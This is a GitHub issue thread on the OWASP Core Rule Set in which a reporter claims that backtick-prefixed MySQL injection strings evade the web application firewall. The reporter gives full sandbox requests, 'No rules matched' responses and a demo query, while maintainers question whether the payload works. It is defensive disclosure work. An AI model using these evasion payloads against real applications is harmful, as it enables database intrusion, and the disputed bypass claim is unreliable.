### ISSUE TITLE
Serious Backtick MySQL sqli payloads not detected from PL1 to PL3

### ISSUE THREAD

**Issue by HackingRepo** [coreruleset/coreruleset#4733]
It seems

```rust
GET /search?q=`OR+1=1+-- HTTP/1.1
Host: sandbox.coreruleset.org
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:152.0) Gecko/20100101 Firefox/152.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive
X-Format-Output: txt-matched-rules-extended
X-CRS-Paranoia-Level: 1

```

and

```rust
HTTP/1.1 404 Not Found
Date: Mon, 20 Jul 2026 13:05:45 GMT
Content-Type: text/plain; charset=iso-8859-1
Connection: keep-alive
X-Unique-ID: al4dKZe8YeMA0RqZQSZTeAAAARQ
x-backend: apache-v4-lts
Content-Length: 167

This payload has been tested against the OWASP CRS web application firewall. 
The test was executed using the apache engine and CRS version v4-lts.

No rules matched.
```

triggers no rule at all, in mysql an attacker can just use backtrick instead of `'` and then bypass entirely the rules, other RDBMS will error out however MySQL/MariaDB will work

**Comment by HackingRepo** [comment]
even PL3 affected, 

```css
GET /search?q=`OR+NULL+-- HTTP/1.1
Host: sandbox.coreruleset.org
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:152.0) Gecko/20100101 Firefox/152.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive
X-Format-Output: txt-matched-rules-extended
X-CRS-Paranoia-Level: 3

```

and then

```css
HTTP/1.1 404 Not Found
Date: Mon, 20 Jul 2026 13:20:34 GMT
Content-Type: text/plain; charset=iso-8859-1
Connection: keep-alive
X-Unique-ID: al4gope8YeMA0RqZQSZTfAAAAQE
x-backend: apache-v4-lts
Content-Length: 167

This payload has been tested against the OWASP CRS web application firewall. 
The test was executed using the apache engine and CRS version v4-lts.

No rules matched.
```

confirming just the PL2 boolean fire, that can be easily escalated to PL3 evaison, an attacker can evade the waf entirely for mysql or mariadb dbs and then execute sqli

**Comment by fzipi** [comment]
Can you add an example of this working in a MySQL database?

**Comment by HackingRepo** [comment]
Hi, fzipi

here is an example i used https://onecompiler.com/mysql#draft-sanf

```mysql
-- create
CREATE TABLE EMPLOYEE (
  empId INTEGER PRIMARY KEY,
  name TEXT NOT NULL,
  dept TEXT NOT NULL
);

-- insert
INSERT INTO EMPLOYEE VALUES (0001, 'Clark', 'Sales');
INSERT INTO EMPLOYEE VALUES (0002, 'Dave', 'Accounting');
INSERT INTO EMPLOYEE VALUES (0003, 'Ava', 'Sales');

-- fetch 
SELECT * FROM EMPLOYEE WHERE `dept` = `empId` OR 1=1 -- `;
```

**Comment by michelamarie** [comment]
Hi, @HackingRepo. Thanks so much for your report! I tried replicating this evasion technique, but I am so far unable to do so myself.

I saw that you ran some SQL at that 'onecompiler' site to create a table and insert some data, but can you more clearly demonstrate the evasion technique working somewhere?

I presume that, for example, you are saying that in a web application with a database schema shown in the code you pasted that appending a query string something like '/search?q=`SELECT * FROM EMPLOYEE' would return the contents of the 'EMPLOYEE' table. Have you observed such a result? If so, can you show that more completely here, so that we may learn more and verify it?

I noticed in the code snippet you put in your initial report post, the request 'GET /search?q=`OR+1=1+-- HTTP/1.1', but I don't see how that would do anything but return an error from a MariaDB / MySQL server, as it is only an 'OR' operator followed by an argument -- it lacks a statement root , like 'SELECT', 'UPDATE', etc. Please forgive me if I am missing something there -- providing that complete demonstration with all the evasion attempt steps, some basic information about the example target, and the result of running the technique would help me understand and see the issue at hand.
